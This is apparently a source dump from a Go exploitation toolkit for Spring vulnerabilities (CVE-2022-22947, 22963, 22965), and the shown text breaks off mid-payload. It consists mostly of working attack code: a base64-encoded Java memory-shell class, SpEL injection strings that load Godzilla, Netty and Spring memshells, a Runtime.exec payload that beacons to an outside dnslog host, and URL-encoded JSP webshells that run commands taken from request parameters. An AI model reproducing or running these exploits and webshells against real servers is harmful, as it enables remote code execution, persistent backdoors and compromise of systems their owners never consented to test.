FRyYWZmaWNIYW5kbGVyAQAQbWVtc2hlbGxfaGFuZGxlcgcBuAwBuQG6AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0DAG7AbwBAAZzdW1zZWMHAb0MAYwBvgcBeQwBvwHABwHBAQAhamF2YS91dGlsL0Fic3RyYWN0TWFwJFNpbXBsZUVudHJ5AQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MAIkBlAwAgQCCDAGTAcIBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cENvbnRlbnQMAYcBtQwBwwG1DAHEAbUMAcUBxgcBegwBxwGqDAGgAcgMAckBygEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9MYXN0SHR0cENvbnRlbnQMAcsBoQwAsACxDACHAIgMAKcAqAcBzAwBzQDuDADqAOsMAc4BzwEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcB0AwB0QHSBwHTDAHUAdUMAIkB1gcB1wcB2AwB2QHaAQAZdGV4dC9wbGFpbjsgY2hhcnNldD1VVEYtOAwBkwHbDAHcAd0HAd4MAd8B4AcB4QwB4gHjAQAVamF2YS9sYW5nL1RocmVhZExvY2FsAQAlaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRHVwbGV4SGFuZGxlcgEAJ3JlYWN0b3IvbmV0dHkvQ2hhbm5lbFBpcGVsaW5lQ29uZmlndXJlcgEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAE2phdmF4L2NyeXB0by9DaXBoZXIBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dAEAF2lvL25ldHR5L2J1ZmZlci9CeXRlQnVmAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAF2phdmEvbGFuZy9yZWZsZWN0L0FycmF5AQAJZ2V0TGVuZ3RoAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJAQADZ2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHZ2V0TmFtZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA1nZXRTdXBlcmNsYXNzAQADc2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAARpbml0AQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAGGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbAEAJCgpTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAIGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lAQAJYWRkQmVmb3JlAQBpKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsUGlwZWxpbmU7AQAHaGVhZGVycwEAKygpTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyczsBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnMBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAA9maXJlQ2hhbm5lbFJlYWQBADwoTGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsBABVqYXZhL3V0aWwvQWJzdHJhY3RNYXABABUoTGphdmEvbGFuZy9PYmplY3Q7KVYBAAZnZXRLZXkBAAhnZXRWYWx1ZQEAB2NvbnRlbnQBABsoKUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAAhjYXBhY2l0eQEAIChJW0JJSSlMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7AQAFd3JpdGUBAAUoW0IpVgEAC3RvQnl0ZUFycmF5AQAuaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cwEAAk9LAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGGlvL25ldHR5L2J1ZmZlci9VbnBvb2xlZAEADGNvcGllZEJ1ZmZlcgEAHShbQilMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7AQB1KExpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFZlcnNpb247TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7TGlvL25ldHR5L2J1ZmZlci9CeXRlQnVmOylWAQAsaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2UBACtpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlck5hbWVzAQAMQ09OVEVOVF9UWVBFAQAbTGlvL25ldHR5L3V0aWwvQXNjaWlTdHJpbmc7AQBVKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzOwEADXdyaXRlQW5kRmx1c2gBADQoTGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmU7AQAmaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlTGlzdGVuZXIBAAVDTE9TRQEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcjsBAB5pby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmUBAAthZGRMaXN0ZW5lcgEAUihMaW8vbmV0dHkvdXRpbC9jb25jdXJyZW50L0dlbmVyaWNGdXR1cmVMaXN0ZW5lcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsAIAAhAHsAAQB8AAUAAAB9AH4AAAAAAH8AfgAAAAAAgAB+AAAACgCBAIIAAQCDAAAAAgCGAAoAhwCIAAAACwABAIkAigABAIsAAABqAAMAAQAAADAqtwABKhICtQADKhIEtQAFKrsABlm3A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" 23 | 24 | const memshell = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}" 25 | 26 | const memshell1 = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}" 27 | 28 | const memshell3 = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GodzillaNettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}" 29 | 30 | type CVE202222947 struct{} 31 | 32 | func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) { 33 | NettyMemshell := fmt.Sprintf(memshell, mem) 34 | SpringRequestMappingMemshell := fmt.Sprintf(memshell1, mem1) 35 | GodzillaNettyMemshell := fmt.Sprintf(memshell3, Godzilla) 36 | log.Debugln("GodzillaNettyMemshell: \n" + GodzillaNettyMemshell) 37 | log.Debugf("SpringRequestMappingMemshell: \n", SpringRequestMappingMemshell) 38 | log.Debugln("NettyMemshell: \n" + NettyMemshell) 39 | log.Debugf("[+] Running default poc") 40 | reqinfo := req2.NewReqInfo() 41 | reqmap := structs.Map(reqinfo) 42 | // 解析target 43 | //t, _ := url.Parse(target) 44 | //target = t.Scheme + "://" + t.Host + "/" 45 | 46 | reqmap["url"] = target 47 | reqmap["method"] = "POST" 48 | // 默认随机UA 不需要设置 49 | reqmap["headers"] = map[string]string{ 50 | "User-Agent": utils.GetUA(), 51 | //"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", 52 | "Content-Type": "application/json", 53 | "Accept-Encoding": "gzip, deflate", 54 | "Accept": "*/*", 55 | } 56 | id := utils.GetCode(6) 57 | payload := "{\n \"id\": \"%s\",\n \"filters\": [{\n \"name\": \"AddResponseHeader\",\n \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n }],\n \"uri\": \"http://127.0.0.1\",\n \"order\": 0\n}" 58 | a := fmt.Sprintf(payload, id, GodzillaNettyMemshell) 59 | reqmap["body"] = a 60 | // 默认配置 61 | reqmap["timeout"] = hashmap["Timeout"].(int) 62 | reqmap["retry"] = hashmap["Retry"].(int) 63 | reqmap["proxy"] = hashmap["Proxy"].(string) 64 | reqmap["mode"] = hashmap["Mode"].(int) 65 | reqmap["h1"] = hashmap["H1"].(bool) 66 | reqmap["redirect"] = hashmap["Redirect"].(bool) 67 | 68 | f := 0 69 | for true { 70 | // 第一次请求 71 | t := target + "actuator/gateway/routes/" + id 72 | reqmap["url"] = t 73 | utils.Send(reqmap) 74 | // 第二次请求 75 | t = target + "actuator/gateway/refresh" 76 | reqmap["url"] = t 77 | reqmap["body"] = "" 78 | 79 | utils.Send(reqmap) 80 | // 第三次请求 81 | t = target + "actuator/gateway/routes/" + id 82 | reqmap["url"] = t 83 | reqmap["method"] = "GET" 84 | resp := utils.Send(reqmap) 85 | // 第四次请求 86 | reqmap["method"] = "DELETE" 87 | utils.Send(reqmap) 88 | // 第五次请求 89 | t = target + "actuator/gateway/refresh" 90 | reqmap["url"] = t 91 | reqmap["method"] = "POST" 92 | utils.Send(reqmap) 93 | 94 | if p.CheckExp(resp, target, hashmap) { 95 | log.Info("[+] Successful exploitation CVE-2020-222947") 96 | p.SaveResult(target, hashmap["Out"].(string)) 97 | break 98 | } else if !p.CheckExp(resp, target, hashmap) { 99 | // NettyMemshell.doInject() 100 | id = utils.GetCode(6) 101 | s := fmt.Sprintf(payload, id, NettyMemshell) 102 | reqmap["body"] = s 103 | f++ 104 | } else if !p.CheckExp(resp, target, hashmap) { 105 | // SpringRequestMappingMemshell.doInject() 106 | id = utils.GetCode(6) 107 | s := fmt.Sprintf(payload, id, SpringRequestMappingMemshell) 108 | reqmap["body"] = s 109 | f++ 110 | } 111 | if f == 3 { 112 | break 113 | } 114 | } 115 | 116 | } 117 | 118 | func (CVE202222947) init() { 119 | log.Debugf("CVE-2022-22947 init") 120 | 121 | } 122 | 123 | // CheckExp 检查是否成功 124 | func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[string]interface{}) bool { 125 | defer func() { 126 | if err := recover(); err != nil { 127 | log.Error("[-] CheckExp error: ", err) 128 | } 129 | }() 130 | log.Debug(resp) 131 | res := resp.Dump() 132 | file := hashmap["Out"].(string) 133 | y := utils.EncodeBase64String("route_id") 134 | 135 | log.Debugf("[+] res:%s", res) 136 | if strings.Contains(res, "route_id") { 137 | qustr := "echo " + y + "|base64 -d" 138 | re, _ := req.R().SetQueryString("cmd="+qustr).SetHeader("X-CMD", qustr).Send("GET", url) 139 | res2 := re.String() 140 | log.Debugf("[+] res2:%s", res2) 141 | if strings.Contains(res2, "route_id") { 142 | log.Debugln("[+] Result: " + re.String()) 143 | log.Info("[+] Successful exploitation CVE-2020-222947") 144 | log.Info("[*] 请手动验证是否漏洞利用成功!") 145 | p.SaveResult(url, file) 146 | return true 147 | } 148 | return true 149 | } 150 | return false 151 | } 152 | 153 | func (CVE202222947) SaveResult(target, file string) { 154 | contexts := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell" 155 | log.Info("[*]: url: " + target + "哥斯拉内存马 密码和key pass key header添加sumsec头 or /?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell") 156 | err := utils.SaveToFile(contexts, file) 157 | if err != nil { 158 | log.Error("[-] SaveResult error: ", err) 159 | return 160 | } 161 | } 162 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-22963.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/fatih/structs" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type CVE202222963 struct{} 12 | 13 | func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) { 14 | 15 | reqinfo := req2.NewReqInfo() 16 | reqmap := structs.Map(reqinfo) 17 | url := target + "functionRouter" 18 | reqmap["url"] = url 19 | reqmap["method"] = "POST" 20 | dnslog := &utils.Dnslog{} 21 | dnslog.SetId("CVE-2022-22963") 22 | ranStr := dnslog.Id() 23 | dnslog.SetPre("dns") 24 | cmd := "nslookup " + ranStr + ".skysa.eyes.sh" 25 | //cmd := "calc.exe" 26 | log.Debugln(cmd) 27 | payload := "T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\")" 28 | //payload := "T(java.net.InetAddress).getByName(\"" + ranStr + ".skysa.eyes.sh\")" 29 | log.Debugf("payload: %s", payload) 30 | log.Debugf("dnslog: %s", dnslog) 31 | // 默认参数 32 | reqmap["timeout"] = hashmap["Timeout"].(int) 33 | reqmap["retry"] = hashmap["Retry"].(int) 34 | reqmap["proxy"] = hashmap["Proxy"].(string) 35 | reqmap["mode"] = hashmap["Mode"].(int) 36 | reqmap["h1"] = hashmap["H1"].(bool) 37 | reqmap["redirect"] = hashmap["Redirect"].(bool) 38 | reqmap["headers"] = map[string]string{ 39 | "User-Agent": utils.GetUA(), 40 | "Content-Type": "application/x-www-form-urlencoded", 41 | //"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", 42 | "spring.cloud.function.routing-expression": payload, 43 | } 44 | 45 | reqmap["method"] = "POST" 46 | reqmap["body"] = ranStr 47 | // 发送请求 48 | resp := utils.Send(reqmap) 49 | 50 | res := dnslog.GetDnslog() 51 | if res { 52 | if p.CheckExp(resp, target, hashmap) { 53 | log.Infof("[+] %s: %s", target, "CVE-2022-22963") 54 | p.SaveResult(target, hashmap["Out"].(string)) 55 | } 56 | } 57 | 58 | } 59 | 60 | func (CVE202222963) init() { 61 | log.Debugf("CVE-2022-22963 init") 62 | 63 | } 64 | 65 | func (CVE202222963) SaveResult(target string, file string) { 66 | contexts := target + " 存在CVE-2022-22963漏洞" 67 | err := utils.SaveToFile(contexts, file) 68 | if err != nil { 69 | log.Debugf("[-] Save result failed") 70 | log.Debugf(err.Error()) 71 | return 72 | } 73 | } 74 | 75 | func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, hashmap map[string]interface{}) bool { 76 | log.Debugf("CVE-2022-22963 checkExp") 77 | return true 78 | 79 | } 80 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-22965.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/fatih/structs" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | "net/url" 10 | "time" 11 | ) 12 | 13 | type CVE202222965 struct{} 14 | 15 | const ( 16 | body = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=" 17 | context = "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di" 18 | body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" 19 | //body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=G:\\source\\spring-framework-rce\\target\\spring_framework_rce-0.0.1-SNAPSHOT\\&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" 20 | // 添加 shell 文件名 21 | body2 = "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 22 | //behinder = "%25%7Bprefix%7Di%20%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%7Bsuffix%7Di%20%25%7Bprefix%7Di%20!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Di%20if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%7Bsuffix%7Di" 23 | 24 | // 哥斯拉 pass key 25 | beichen = "%25%7Bprefix%7Di!%20String%20xc%3D%223c6e0b8a9c15224a%22%3B%20class%20X%20extends%20ClassLoader%7Bpublic%20X(ClassLoader%20z)%7Bsuper(z)%3B%7Dpublic%20Class%20Q(byte%5B%5D%20cb)%7Breturn%20super.defineClass(cb%2C%200%2C%20cb.length)%3B%7D%20%7Dpublic%20byte%5B%5D%20x(byte%5B%5D%20s%2Cboolean%20m)%7B%20try%7Bjavax.crypto.Cipher%20c%3Djavax.crypto.Cipher.getInstance(%22AES%22)%3Bc.init(m%3F1%3A2%2Cnew%20javax.crypto.spec.SecretKeySpec(xc.getBytes()%2C%22AES%22))%3Breturn%20c.doFinal(s)%3B%20%7Dcatch%20(Exception%20e)%7Breturn%20null%3B%20%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Ditry%7Bbyte%5B%5D%20data%3Dnew%20byte%5BInteger.parseInt(request.getHeader(%22Content-Length%22))%5D%3Bjava.io.InputStream%20inputStream%3D%20request.getInputStream()%3Bint%20_num%3D0%3Bwhile%20((_num%2B%3DinputStream.read(data%2C_num%2Cdata.length))%3Cdata.length)%3Bdata%3Dx(data%2C%20false)%3Bif%20(session.getAttribute(%22payload%22)%3D%3Dnull)%7Bsession.setAttribute(%22payload%22%2Cnew%20X(this.getClass().getClassLoader()).Q(data))%3B%7Delse%7Brequest.setAttribute(%22parameters%22%2C%20data)%3BObject%20f%3D((Class)session.getAttribute(%22payload%22)).newInstance()%3Bjava.io.ByteArray